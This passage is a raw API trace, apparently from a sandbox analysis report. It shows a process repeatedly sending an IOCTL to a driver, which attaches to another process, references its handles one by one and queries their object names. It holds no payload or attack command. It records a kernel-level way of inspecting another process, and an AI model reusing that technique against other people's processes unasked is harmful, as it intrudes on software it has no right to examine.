Size=0x808) returned 0x1ea15e0 [0244.126] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.126] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.126] PsAcquireProcessExitSynchronization () returned 0x0 [0244.126] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.126] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018a7e30, HandleInformation=0x0) returned 0x0 [0244.127] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.127] PsReleaseProcessExitSynchronization () returned 0x2 [0244.127] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.127] ObQueryNameString (in: Object=0xfffff8a0018a7e30, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.127] ObfDereferenceObject (Object=0xfffff8a0018a7e30) returned 0x1 [0244.127] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.127] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.127] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.127] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.127] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.127] PsAcquireProcessExitSynchronization () returned 0x0 [0244.127] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.127] ObReferenceObjectByHandle (in: Handle=0x560, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018b0ee0, HandleInformation=0x0) returned 0x0 [0244.127] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.127] PsReleaseProcessExitSynchronization () returned 0x2 [0244.127] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.127] ObQueryNameString (in: Object=0xfffff8a0018b0ee0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.127] ObfDereferenceObject (Object=0xfffff8a0018b0ee0) returned 0x1 [0244.127] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.127] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.127] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.127] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.127] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.127] PsAcquireProcessExitSynchronization () returned 0x0 [0244.127] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.127] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018adf30, HandleInformation=0x0) returned 0x0 [0244.127] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.127] PsReleaseProcessExitSynchronization () returned 0x2 [0244.127] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.127] ObQueryNameString (in: Object=0xfffff8a0018adf30, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.128] ObfDereferenceObject (Object=0xfffff8a0018adf30) returned 0x1 [0244.128] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.128] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.128] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.128] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.128] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.128] PsAcquireProcessExitSynchronization () returned 0x0 [0244.128] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.128] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018b4d60, HandleInformation=0x0) returned 0x0 [0244.128] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.128] PsReleaseProcessExitSynchronization () returned 0x2 [0244.128] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.128] ObQueryNameString (in: Object=0xfffff8a0018b4d60, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.128] ObfDereferenceObject (Object=0xfffff8a0018b4d60) returned 0x1 [0244.128] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.128] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.128] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.128] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.128] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.128] PsAcquireProcessExitSynchronization () returned 0x0 [0244.128] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.128] ObReferenceObjectByHandle (in: Handle=0x590, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018aee60, HandleInformation=0x0) returned 0x0 [0244.128] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.128] PsReleaseProcessExitSynchronization () returned 0x2 [0244.128] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.128] ObQueryNameString (in: Object=0xfffff8a0018aee60, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.128] ObfDereferenceObject (Object=0xfffff8a0018aee60) returned 0x1 [0244.128] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.129] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.129] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.129] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.129] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.129] PsAcquireProcessExitSynchronization () returned 0x0 [0244.129] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.129] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018bc450, HandleInformation=0x0) returned 0x0 [0244.129] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.129] PsReleaseProcessExitSynchronization () returned 0x2 [0244.129] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.129] ObQueryNameString (in: Object=0xfffff8a0018bc450, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.129] ObfDereferenceObject (Object=0xfffff8a0018bc450) returned 0x1 [0244.129] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.129] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.129] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.129] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.129] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.129] PsAcquireProcessExitSynchronization () returned 0x0 [0244.129] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.129] ObReferenceObjectByHandle (in: Handle=0x5b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018c2eb0, HandleInformation=0x0) returned 0x0 [0244.129] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.129] PsReleaseProcessExitSynchronization () returned 0x2 [0244.129] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.129] ObQueryNameString (in: Object=0xfffff8a0018c2eb0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.129] ObfDereferenceObject (Object=0xfffff8a0018c2eb0) returned 0x1 [0244.129] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.129] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.129] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.129] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.130] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.130] PsAcquireProcessExitSynchronization () returned 0x0 [0244.130] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.130] ObReferenceObjectByHandle (in: Handle=0x5c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018c2820, HandleInformation=0x0) returned 0x0 [0244.130] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.130] PsReleaseProcessExitSynchronization () returned 0x2 [0244.130] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.130] ObQueryNameString (in: Object=0xfffff8a0018c2820, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.130] ObfDereferenceObject (Object=0xfffff8a0018c2820) returned 0x1 [0244.130] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.130] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.130] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.130] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.130] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.130] PsAcquireProcessExitSynchronization () returned 0x0 [0244.130] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.130] ObReferenceObjectByHandle (in: Handle=0x5d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018c3700, HandleInformation=0x0) returned 0x0 [0244.130] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.130] PsReleaseProcessExitSynchronization () returned 0x2 [0244.130] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.130] ObQueryNameString (in: Object=0xfffff8a0018c3700, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.130] ObfDereferenceObject (Object=0xfffff8a0018c3700) returned 0x1 [0244.130] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.130] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.130] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.130] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.130] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.130] PsAcquireProcessExitSynchronization () returned 0x0 [0244.130] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.131] ObReferenceObjectByHandle (in: Handle=0x5e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018c9b30, HandleInformation=0x0) returned 0x0 [0244.131] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.131] PsReleaseProcessExitSynchronization () returned 0x2 [0244.131] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.131] ObQueryNameString (in: Object=0xfffff8a0018c9b30, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.131] ObfDereferenceObject (Object=0xfffff8a0018c9b30) returned 0x1 [0244.131] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.131] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.131] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.131] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.131] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.131] PsAcquireProcessExitSynchronization () returned 0x0 [0244.131] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.131] ObReferenceObjectByHandle (in: Handle=0x5f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018bfa90, HandleInformation=0x0) returned 0x0 [0244.131] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.131] PsReleaseProcessExitSynchronization () returned 0x2 [0244.131] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.131] ObQueryNameString (in: Object=0xfffff8a0018bfa90, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.131] ObfDereferenceObject (Object=0xfffff8a0018bfa90) returned 0x1 [0244.131] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.131] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.131] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.131] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.131] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.131] PsAcquireProcessExitSynchronization () returned 0x0 [0244.131] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.131] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018cc680, HandleInformation=0x0) returned 0x0 [0244.131] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.131] PsReleaseProcessExitSynchronization () returned 0x2 [0244.131] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.132] ObQueryNameString (in: Object=0xfffff8a0018cc680, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.132] ObfDereferenceObject (Object=0xfffff8a0018cc680) returned 0x1 [0244.132] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.132] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.132] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.132] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.132] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.132] PsAcquireProcessExitSynchronization () returned 0x0 [0244.132] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.132] ObReferenceObjectByHandle (in: Handle=0x610, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00186efc0, HandleInformation=0x0) returned 0x0 [0244.132] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.132] PsReleaseProcessExitSynchronization () returned 0x2 [0244.132] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.132] ObQueryNameString (in: Object=0xfffff8a00186efc0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.132] ObfDereferenceObject (Object=0xfffff8a00186efc0) returned 0x1 [0244.132] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.132] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.132] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.132] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.132] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.132] PsAcquireProcessExitSynchronization () returned 0x0 [0244.132] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.132] ObReferenceObjectByHandle (in: Handle=0x620, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018d8520, HandleInformation=0x0) returned 0x0 [0244.132] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.132] PsReleaseProcessExitSynchronization () returned 0x2 [0244.132] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.132] ObQueryNameString (in: Object=0xfffff8a0018d8520, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.132] ObfDereferenceObject (Object=0xfffff8a0018d8520) returned 0x1 [0244.132] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.132] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.132] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.133] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.133] PsAcquireProcessExitSynchronization () returned 0x0 [0244.133] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.133] ObReferenceObjectByHandle (in: Handle=0x630, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018da480, HandleInformation=0x0) returned 0x0 [0244.133] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.133] PsReleaseProcessExitSynchronization () returned 0x2 [0244.133] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.133] ObQueryNameString (in: Object=0xfffff8a0018da480, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.133] ObfDereferenceObject (Object=0xfffff8a0018da480) returned 0x1 [0244.133] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.133] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.133] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, 